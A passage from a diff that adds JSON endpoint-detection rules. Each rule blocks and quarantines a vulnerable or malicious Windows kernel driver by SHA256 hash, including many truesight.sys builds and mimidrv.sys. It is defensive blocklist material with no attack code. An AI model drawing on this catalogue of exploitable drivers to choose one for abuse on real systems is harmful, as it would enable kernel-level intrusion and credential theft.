+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "312c83a99928c30c1fc55a0a1e7571a63b0e04391abe3392115bb3b7e3f60f47",
+ "comment": "Malicious Kernel Driver (aka driver_312c83a9.sys) [https://www.loldrivers.io/drivers/495f0f36-c5e0-467d-8115-b5bdbe7ff686/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a98ff7cc-2848-53ef-a38a-618805b4667a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814467Z",
+ "creation_date": "2026-03-23T11:45:31.814470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afdc52dfd0928505e0246158978dff460e0697cc2b387c5bb52b0fe328a1d170",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9937cb7-ca64-5f66-a804-94bd07670358",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826843Z",
+ "creation_date": "2026-03-23T11:45:30.826846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d3c53ae698e17f331383a93990e2468c1bfd6a36a4830ffa9582ceb60d824dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9a94c6b-ee1b-5f9f-bf37-ea258378241f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826169Z",
+ "creation_date": "2026-03-23T11:45:30.826171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ae74282bb4343f3e9c15462b67afff3f737de22f8d238751aff767c5d750959",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9aac860-6f84-56b0-a872-d906d159fa3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481043Z",
+ "creation_date": "2026-03-23T11:45:30.481045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2695390a8a7448390fe383beb1eee06d582202683f0273d6e72ef39a8cf709e1",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9b60390-67d3-5be2-814a-16376b529e3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982086Z",
+ "creation_date": "2026-03-23T11:45:29.982088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982094Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bf29a2df52110ed463d51376562afceac0e80fbb1033284cf50edd86c406b14",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9e1278d-db32-5f25-8987-ebad5525027b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836577Z",
+ "creation_date": "2026-03-23T11:45:30.836579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eafc2ce205bbdd326250823d82060acc957a1bc13b7af76939409db6e43210c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9e31460-4b9b-5f36-b53c-33467990d52d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152134Z",
+ "creation_date": "2026-03-23T11:45:31.152137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac1a83279e35ee1e9537886adc1c5b5b3d4976a80ed52febf6ca416a5dde6055",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9e6cf8a-3898-552f-ab94-a0da0ba58c15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147112Z",
+ "creation_date": "2026-03-23T11:45:31.147114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ec6bd4ea58f2a1eb2aa827f40c145c0271a36a7400309b83ce7598d4a0dd765",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9f22e57-d81d-59d6-8fc9-e7440cbab55c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455361Z",
+ "creation_date": "2026-03-23T11:45:30.455364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62a17c9ec21461badecd1c25744a42bf5c9c0ed39b979fb07ca817f30c862a35",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9fd75bf-b113-5e5e-b35c-5f66f7e2c301",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831200Z",
+ "creation_date": "2026-03-23T11:45:30.831202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f523e46679c9b40f5bf4831e3cb60d90bd27b1acd3b4b7a12e1fc9ae06fdb5ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa077870-661f-577c-b335-fcf15ece173c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973793Z",
+ "creation_date": "2026-03-23T11:45:29.973795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80a59ca71fc20961ccafc0686051e86ae4afbbd4578cb26ad4570b9207651085",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa0b4dbb-d53c-56c0-92e9-d7eb56fc4092",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823070Z",
+ "creation_date": "2026-03-23T11:45:30.823072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "039f442ffbda7decaaf1e367db6fc6f28cc73d549527ef5bedf2be8badedbfd7",
+ "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa10c950-dc1e-5287-8cc5-417bbb892544",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981926Z",
+ "creation_date": "2026-03-23T11:45:29.981929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f05f74ebae7e65d389703d423445ffb269e657d8278b0523417e1f72b0228eb",
+ "comment": "Vulnerable Kernel Driver (aka TGSafe.sys) [https://www.loldrivers.io/drivers/ad693146-4adf-4407-bb20-f2505e34c226/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa11682b-5e88-56a8-8d73-94eb6b434619",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470162Z",
+ "creation_date": "2026-03-23T11:45:30.470165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea318c5300b57b35e07b4c16453a660cd5ce059cdb6578d3057e848e14d68eac",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa12f38e-232c-5b95-abbd-37d419dcab44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493400Z",
+ "creation_date": "2026-03-23T11:45:31.493402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7198c9e16ef10a701abbae9422755d904e730893724988b3f63226ad499de02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa3bb407-fea5-5f50-8ed7-027961654c59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821890Z",
+ "creation_date": "2026-03-23T11:45:31.821892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a87f78a357f9eccc2aa6a04ff5b70d6044d3c6b0ba436d0c4199f3e57272c32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa3eb61c-c864-5911-b77b-3645b42e5207",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815850Z",
+ "creation_date": "2026-03-23T11:45:31.815852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e4cf5d2df79e2f561c228b3cbbdb6e1c5b0eff9e62144b4a97d5d128669de80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa42c9d7-a497-5ac7-8478-e0e5a2057f15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146818Z",
+ "creation_date": "2026-03-23T11:45:32.146821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e7c62daf3da6ea70530adc9a65bd97dcdb4afe0b82e7622f6d965bdaa99025b",
+ "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/9974b134-7fee-4c7a-9b0d-38b3b2d7e957/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa48bdd3-1493-52b5-9721-fd29a6097523",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475666Z",
+ "creation_date": "2026-03-23T11:45:31.475670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "433fc3f44a990949b876015da853a4ff4e7a7c6d0a62eeadf795489b4e15843b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa5714ae-a23b-5f7e-8b6b-279b465d2315",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818486Z",
+ "creation_date": "2026-03-23T11:45:30.818488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8b51ab681714e491ab1a59a7c9419db39db04b0dd7be11293f3a0951afe740e",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa6058e1-bd62-5153-b892-73498bae1706",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478272Z",
+ "creation_date": "2026-03-23T11:45:31.478287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e52e61ea71ac13f8f12e6aef2ac4d9e580e1d8b25dbb405e005599a4a4b13d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa611048-97d3-50f9-98ba-18930e5a85ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494565Z",
+ "creation_date": "2026-03-23T11:45:31.494567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06f34294ae1fa7ee0e3c46af301a7c486f08377ce0621c078382f7beed5a66d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
